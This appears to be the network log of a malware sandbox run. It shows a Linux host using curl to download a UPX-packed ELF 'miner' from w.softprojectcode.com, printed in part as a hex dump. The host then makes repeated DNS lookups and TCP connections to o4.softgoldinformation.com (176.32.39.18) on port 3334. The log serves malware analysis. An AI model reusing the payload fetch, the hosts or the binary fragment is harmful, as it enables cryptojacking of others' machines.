                                  Mar 10, 2025 02:53:16.020999908 CET333455888176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:21.195697069 CET558903334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:21.200742960 CET333455890176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:21.200988054 CET558903334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:21.202879906 CET558903334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:21.207878113 CET333455890176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:22.951066017 CET333455890176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:22.953726053 CET558903334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:22.962330103 CET333455890176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:28.201286077 CET558923334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:28.206433058 CET333455892176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:28.206547976 CET558923334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:28.207932949 CET558923334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:28.213077068 CET333455892176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:29.947810888 CET333455892176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:29.950393915 CET558923334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:29.955717087 CET333455892176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:35.209388018 CET558943334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:35.215980053 CET333455894176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:35.216073990 CET558943334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:35.217772961 CET558943334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:35.224351883 CET333455894176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:36.982822895 CET333455894176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:36.985049009 CET558943334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:36.990780115 CET333455894176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:42.215228081 CET558963334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:42.221378088 CET333455896176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:42.221486092 CET558963334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:42.222680092 CET558963334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:42.229624033 CET333455896176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:43.980185032 CET333455896176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:43.982459068 CET558963334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:43.982516050 CET558963334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:43.988540888 CET333455896176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:49.253773928 CET558983334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:49.259001017 CET333455898176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:49.259074926 CET558983334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:49.259988070 CET558983334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:49.265088081 CET333455898176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:51.012598038 CET333455898176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:51.014425039 CET558983334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:51.014499903 CET558983334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:51.019932032 CET333455898176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:56.229468107 CET559003334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:56.236357927 CET333455900176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:56.236440897 CET559003334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:56.237926960 CET559003334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:56.242994070 CET333455900176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:57.982623100 CET333455900176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:53:57.984606028 CET559003334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:53:57.993227005 CET333455900176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:03.236445904 CET559023334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:03.241926908 CET333455902176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:03.242221117 CET559023334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:03.244074106 CET559023334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:03.249377966 CET333455902176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:04.977667093 CET333455902176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:04.978611946 CET559023334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:04.980962992 CET559023334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:04.986171007 CET333455902176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:10.242551088 CET559043334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:10.247972965 CET333455904176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:10.248070955 CET559043334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:10.250154018 CET559043334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:10.255198002 CET333455904176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:11.998195887 CET333455904176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:12.001147985 CET559043334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:12.006278992 CET333455904176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:17.249411106 CET559063334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:17.257088900 CET333455906176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:17.257216930 CET559063334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:17.258498907 CET559063334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:17.267474890 CET333455906176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:18.993829012 CET333455906176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:18.994313002 CET559063334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:18.995743036 CET559063334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:19.001344919 CET333455906176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:24.282815933 CET559083334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:24.287961960 CET333455908176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:24.288058043 CET559083334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:24.289243937 CET559083334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:24.294339895 CET333455908176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:26.028527021 CET333455908176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:26.030272007 CET559083334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:26.030999899 CET559083334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:26.037421942 CET333455908176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:31.262841940 CET559103334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:31.271271944 CET333455910176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:31.271351099 CET559103334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:31.272332907 CET559103334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:31.280961990 CET333455910176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:33.010149002 CET333455910176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:33.012243986 CET559103334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:33.018059969 CET333455910176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:38.270294905 CET559123334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:38.275746107 CET333455912176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:38.275849104 CET559123334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:38.277105093 CET559123334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:38.282320976 CET333455912176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:40.010080099 CET333455912176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:40.012065887 CET559123334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:40.017316103 CET333455912176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:45.277440071 CET559143334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:45.282855988 CET333455914176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:45.282979012 CET559143334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:45.284333944 CET559143334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:45.289465904 CET333455914176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:47.010107040 CET333455914176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:47.012087107 CET559143334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:47.017466068 CET333455914176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:52.284828901 CET559163334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:52.294202089 CET333455916176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:52.294415951 CET559163334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:52.295685053 CET559163334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:52.305017948 CET333455916176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:54.044574976 CET333455916176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:54.046168089 CET559163334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:54.046830893 CET559163334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:54.051908016 CET333455916176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:59.329605103 CET559183334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:59.334760904 CET333455918176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:54:59.334861994 CET559183334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:59.336106062 CET559183334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:54:59.344708920 CET333455918176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:01.072707891 CET333455918176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:01.074146986 CET559183334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:01.075875998 CET559183334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:01.080944061 CET333455918176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:06.299339056 CET559203334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:06.304941893 CET333455920176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:06.305058956 CET559203334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:06.306762934 CET559203334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:06.311950922 CET333455920176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:08.041914940 CET333455920176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:08.042175055 CET559203334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:08.044126034 CET559203334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:08.051549911 CET333455920176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:13.305990934 CET559223334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:13.311348915 CET333455922176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:13.311649084 CET559223334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:13.313299894 CET559223334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:13.318530083 CET333455922176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:15.042134047 CET333455922176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:15.044667959 CET559223334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:15.050266981 CET333455922176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:20.312694073 CET559243334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:20.318015099 CET333455924176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:20.318093061 CET559243334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:20.320257902 CET559243334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:20.325443029 CET333455924176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:22.076910019 CET333455924176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:22.078048944 CET559243334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:22.079034090 CET559243334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:22.084081888 CET333455924176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:27.319525003 CET559263334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:27.324845076 CET333455926176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:27.324913979 CET559263334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:27.325623035 CET559263334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:27.330899000 CET333455926176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:29.076195002 CET333455926176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:29.078013897 CET559263334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:29.078298092 CET559263334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:29.083445072 CET333455926176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:34.353840113 CET559283334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:34.359029055 CET333455928176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:34.359134912 CET559283334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:34.360107899 CET559283334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:34.367566109 CET333455928176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:36.108299971 CET333455928176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:36.109993935 CET559283334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:36.110630035 CET559283334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:36.117463112 CET333455928176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:41.332567930 CET559303334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:41.337827921 CET333455930176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:41.337970972 CET559303334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:41.339359999 CET559303334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:41.344496012 CET333455930176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:43.076086044 CET333455930176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:43.077989101 CET559303334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:43.078411102 CET559303334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:43.084606886 CET333455930176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:48.339854002 CET559323334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:48.346112967 CET333455932176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:48.346232891 CET559323334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:48.347680092 CET559323334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:48.353291035 CET333455932176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:50.090837002 CET333455932176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:50.093321085 CET559323334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:50.100009918 CET333455932176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:55.346745968 CET559343334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:55.352241039 CET333455934176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:55.352343082 CET559343334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:55.353491068 CET559343334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:55.359430075 CET333455934176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:57.114025116 CET333455934176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:55:57.116168976 CET559343334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:55:57.125286102 CET333455934176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:56:02.349570990 CET559363334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:56:02.354712009 CET333455936176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:56:02.354834080 CET559363334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:56:02.355937958 CET559363334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:56:02.361006021 CET333455936176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:56:04.089349985 CET333455936176.32.39.18192.168.2.13
                                  Mar 10, 2025 02:56:04.089886904 CET559363334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:56:04.091141939 CET559363334192.168.2.13176.32.39.18
                                  Mar 10, 2025 02:56:04.096147060 CET333455936176.32.39.18192.168.2.13
                                  TimestampSource PortDest PortSource IPDest IP
                                  Mar 10, 2025 02:52:35.316735983 CET5817053192.168.2.131.1.1.1
                                  Mar 10, 2025 02:52:35.316850901 CET5924553192.168.2.131.1.1.1
                                  Mar 10, 2025 02:52:35.329710007 CET53592451.1.1.1192.168.2.13
                                  Mar 10, 2025 02:52:35.337425947 CET53581701.1.1.1192.168.2.13
                                  Mar 10, 2025 02:52:38.128416061 CET4307753192.168.2.131.1.1.1
                                  Mar 10, 2025 02:52:38.144808054 CET53430771.1.1.1192.168.2.13
                                  Mar 10, 2025 02:52:38.550012112 CET4211353192.168.2.131.1.1.1
                                  Mar 10, 2025 02:52:38.550091028 CET5690853192.168.2.131.1.1.1
                                  Mar 10, 2025 02:52:38.564291954 CET53569081.1.1.1192.168.2.13
                                  Mar 10, 2025 02:52:38.565588951 CET53421131.1.1.1192.168.2.13
                                  Mar 10, 2025 02:53:14.201981068 CET4365153192.168.2.131.1.1.1
                                  Mar 10, 2025 02:53:14.225066900 CET53436511.1.1.1192.168.2.13
                                  Mar 10, 2025 02:53:49.229185104 CET3900053192.168.2.131.1.1.1
                                  Mar 10, 2025 02:53:49.250493050 CET53390001.1.1.1192.168.2.13
                                  Mar 10, 2025 02:54:24.264632940 CET4820753192.168.2.131.1.1.1
                                  Mar 10, 2025 02:54:24.278420925 CET53482071.1.1.1192.168.2.13
                                  Mar 10, 2025 02:54:59.302081108 CET5547753192.168.2.131.1.1.1
                                  Mar 10, 2025 02:54:59.324547052 CET53554771.1.1.1192.168.2.13
                                  Mar 10, 2025 02:55:20.842843056 CET5525153192.168.2.131.1.1.1
                                  Mar 10, 2025 02:55:20.842901945 CET5433153192.168.2.131.1.1.1
                                  Mar 10, 2025 02:55:20.850116014 CET53543311.1.1.1192.168.2.13
                                  Mar 10, 2025 02:55:20.850397110 CET53552511.1.1.1192.168.2.13
                                  Mar 10, 2025 02:55:34.336666107 CET3882053192.168.2.131.1.1.1
                                  Mar 10, 2025 02:55:34.349735022 CET53388201.1.1.1192.168.2.13
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Mar 10, 2025 02:52:35.316735983 CET192.168.2.131.1.1.10x1e83Standard query (0)w.softprojectcode.comA (IP address)IN (0x0001)false
                                  Mar 10, 2025 02:52:35.316850901 CET192.168.2.131.1.1.10x85aStandard query (0)w.softprojectcode.com28IN (0x0001)false
                                  Mar 10, 2025 02:52:38.128416061 CET192.168.2.131.1.1.10x8321Standard query (0)o.softgoldinformation.comA (IP address)IN (0x0001)false
                                  Mar 10, 2025 02:52:38.550012112 CET192.168.2.131.1.1.10x54f6Standard query (0)o4.softgoldinformation.comA (IP address)IN (0x0001)false
                                  Mar 10, 2025 02:52:38.550091028 CET192.168.2.131.1.1.10x5aa5Standard query (0)o4.softgoldinformation.com28IN (0x0001)false
                                  Mar 10, 2025 02:53:14.201981068 CET192.168.2.131.1.1.10x31d1Standard query (0)o4.softgoldinformation.com28IN (0x0001)false
                                  Mar 10, 2025 02:53:49.229185104 CET192.168.2.131.1.1.10x93caStandard query (0)o4.softgoldinformation.com28IN (0x0001)false
                                  Mar 10, 2025 02:54:24.264632940 CET192.168.2.131.1.1.10x28a4Standard query (0)o4.softgoldinformation.com28IN (0x0001)false
                                  Mar 10, 2025 02:54:59.302081108 CET192.168.2.131.1.1.10xf9b4Standard query (0)o4.softgoldinformation.com28IN (0x0001)false
                                  Mar 10, 2025 02:55:20.842843056 CET192.168.2.131.1.1.10x43b7Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                  Mar 10, 2025 02:55:20.842901945 CET192.168.2.131.1.1.10xc562Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                  Mar 10, 2025 02:55:34.336666107 CET192.168.2.131.1.1.10xf126Standard query (0)o4.softgoldinformation.com28IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Mar 10, 2025 02:52:35.337425947 CET1.1.1.1192.168.2.130x1e83No error (0)w.softprojectcode.com107.167.34.74A (IP address)IN (0x0001)false
                                  Mar 10, 2025 02:52:35.337425947 CET1.1.1.1192.168.2.130x1e83No error (0)w.softprojectcode.com192.186.12.50A (IP address)IN (0x0001)false
                                  Mar 10, 2025 02:52:35.337425947 CET1.1.1.1192.168.2.130x1e83No error (0)w.softprojectcode.com107.167.42.211A (IP address)IN (0x0001)false
                                  Mar 10, 2025 02:52:35.337425947 CET1.1.1.1192.168.2.130x1e83No error (0)w.softprojectcode.com107.167.42.210A (IP address)IN (0x0001)false
                                  Mar 10, 2025 02:52:35.337425947 CET1.1.1.1192.168.2.130x1e83No error (0)w.softprojectcode.com192.186.12.54A (IP address)IN (0x0001)false
                                  Mar 10, 2025 02:52:35.337425947 CET1.1.1.1192.168.2.130x1e83No error (0)w.softprojectcode.com107.167.34.78A (IP address)IN (0x0001)false
                                  Mar 10, 2025 02:52:38.144808054 CET1.1.1.1192.168.2.130x8321No error (0)o.softgoldinformation.com176.32.39.18A (IP address)IN (0x0001)false
                                  Mar 10, 2025 02:52:38.565588951 CET1.1.1.1192.168.2.130x54f6No error (0)o4.softgoldinformation.com176.32.39.18A (IP address)IN (0x0001)false
                                  Mar 10, 2025 02:55:20.850397110 CET1.1.1.1192.168.2.130x43b7No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                  Mar 10, 2025 02:55:20.850397110 CET1.1.1.1192.168.2.130x43b7No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                  • w.softprojectcode.com
                                  Session IDSource IPSource PortDestination IPDestination Port
                                  0192.168.2.1346850107.167.34.7480
                                  TimestampBytes transferredDirectionData
                                  Mar 10, 2025 02:52:35.357093096 CET102OUTGET /miner HTTP/1.1
                                  Host: w.softprojectcode.com
                                  User-Agent: curl/7.68.0
                                  Accept: */*
                                  Mar 10, 2025 02:52:35.941335917 CET1236INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Mon, 10 Mar 2025 01:52:35 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 1827416
                                  Last-Modified: Sun, 23 Feb 2025 15:13:26 GMT
                                  Connection: keep-alive
                                  ETag: "67bb3b16-1be258"
                                  Accept-Ranges: bytes
                                  Data Raw: 7f 45 4c 46 02 01 01 03 00 00 00 00 00 00 00 00 02 00 3e 00 01 00 00 00 90 d0 5b 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 38 00 02 00 40 00 00 00 00 00 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 cd e1 1b 00 00 00 00 00 cd e1 1b 00 00 00 00 00 00 00 20 00 00 00 00 00 01 00 00 00 06 00 00 00 60 fb 0c 00 00 00 00 00 60 fb ac 00 00 00 00 00 60 fb ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 29 5d f5 f7 55 50 58 21 4c 11 0d 16 00 00 00 00 c8 d0 4b 00 c8 d0 4b 00 58 01 00 00 6b 00 00 00 0e 00 00 00 1a 03 00 3f 91 45 84 68 3d 89 a6 da 8a cc 93 e2 4e d9 06 b7 b9 e2 8b 65 e1 a7 e4 55 9b b4 84 de f6 62 6f a5 47 ae 8a b3 79 a0 a2 24 03 c8 1a 70 4c c4 3a 72 7a 33 91 18 d8 ac d6 88 bd ec 7b 77 c0 f6 a7 ee f7 a9 e6 a8 60 d9 0d 1a 85 41 05 bf 68 c3 f0 c5 54 d3 4e 46 25 c1 dd 46 4d d0 25 6a 0b dd ac c6 be 6b d2 3e 68 23 72 15 4f 48 00 f2 52 1b 00 0e 00 00 00 1a 03 00 28 3a 0e 4d [TRUNCATED]
                                  Data Ascii: ELF>[@@8@@@ ``` )]UPX!LKKXk?Eh=NeUboGy$pL:rz3{w`AhTNF%FM%jk>h#rOHR(:M1@7NJ.m'>JT[[f=.NO()vS_#;dq27}pDoB"NZ~}l:O&HJ.5NQQ>Jt^petqd},7ETlm.Q"2x}XvER(Nt9D*u"T13=7FWfBajFy'RX,Xr,%Fu:5!kPdqQ&/VGkb>lq4l~Jp[{q;40i!$jDb&<.aKS *3j6Z,Zr^qHiFD/0HoL]:V+K]X/?07[X1m<$IOFoI^setl#cL}v?NgTIkUg],O)?2K^I3-)\yaR]4\>wE
                                  Mar 10, 2025 02:52:35.941559076 CET248INData Raw: 8a 78 62 e7 8c 98 05 ae 7a 5b 0b 27 34 e2 f4 31 ba 1e 71 b8 45 dc 90 24 f9 cd d5 67 14 ee 81 6b 41 74 83 1f d1 73 32 1a 81 b7 21 4e 5b 68 7e d3 a0 12 9c b6 b3 bb 3e f8 d1 27 9a 09 2d 6e 33 80 3e aa 63 d1 4f 10 60 c4 7f c5 b3 76 90 07 ed 1f 77 b4
                                  Data Ascii: xbz['41qE$gkAts2!N[h~>'-n3>cO`vw}Xv=cO6:Gl{rx0w9}/3p?Z<TCu?DU~zrTE(`N?}S'ej0!dJU
                                  Mar 10, 2025 02:52:35.941679001 CET1236INData Raw: 85 8c bf 4e ee 27 11 d5 19 7c 02 31 a7 09 8c 16 4d 83 18 77 7f 04 02 8e 9a 3e 10 96 cc b0 69 5e 9f 37 33 a3 9a c7 70 10 8a cd a0 f1 a3 bf 16 51 dd aa 5b 51 32 91 d7 30 44 eb ef 79 19 75 c0 88 bb ca a8 0a 6e 81 fb f2 c0 de 7d 6b 0c 83 27 5f 58 80
                                  Data Ascii: N'|1Mw>i^73pQ[Q20Dyun}k'_XlE@nfZ,+Lv]pF}cI~mImli]LwxB@L_lw: UnXU.Q"YnI5.A|Z38OF"N3K@n
                                  Mar 10, 2025 02:52:35.942341089 CET1236INData Raw: 8f ee d8 01 82 ca b5 2d 4b 4a 67 09 4b ea 5c 5a 53 34 b7 6b 08 d6 e4 b3 d6 ac bc 50 0d c7 09 5b 03 4c 48 9b 66 8b 93 05 59 e5 26 83 3a cd 56 8d 20 94 81 bc aa 75 29 0c 97 9f 73 f4 41 e6 93 6d 9f 05 1a 3c b2 14 ab 30 c3 83 18 27 e9 20 fc 51 48 5f
                                  Data Ascii: -KJgK\ZS4kP[LHfY&:V u)sAm<0' QH_9Pv:]}LLLPj1va`H=_L<BS;3}XT<Rie0]/FE.{k;cjyBH!,LvpN=>rIi
                                  Mar 10, 2025 02:52:35.942358017 CET484INData Raw: 6c 7c 74 b8 25 e2 f2 f3 50 dc 73 75 10 48 af a0 5a 63 7e d8 49 9e 91 61 d4 d2 04 34 cd ab 36 46 d9 eb 04 14 ab ce e8 e0 ef e3 19 3a cf eb 42 08 58 0e 82 4f e6 cd 6c 4d 7c df 09 6c 5a ca 74 f2 98 ae af 44 99 fa c3 11 78 3a 40 c9 00 51 66 84 24 a0
                                  Data Ascii: l|t%PsuHZc~Ia46F:BXOlM|lZtDx:@Qf$e^S2uoC<cx =nuvr?%AlVSEh`h6Ehj'UeVY!6N@$$CHE(9"6G)c?p`r
                                  Mar 10, 2025 02:52:35.943773031 CET1236INData Raw: c4 39 75 a7 7e b7 12 01 4a 15 dd e6 42 49 0b c1 5c 68 f0 7e 70 ed a4 29 4e 7d e0 97 b7 77 dc f3 5e 91 c8 54 5b ef ba 73 20 51 c0 93 a1 b1 9b a9 f6 8f a4 ea 55 5d 76 22 22 66 09 31 e3 1a 73 fb 73 a7 be 8b ed f3 b7 99 5d cc 27 08 ee db ec bc dd c7
                                  Data Ascii: 9u~JBI\h~p)N}w^T[s QU]v""f1ss]'H0^Vv6[*d/hJ{?us+(i^Jy+83y<-oG;Ugorb4QoyN82fab0`KKKx{tZQR5'7wsfS<]%k@
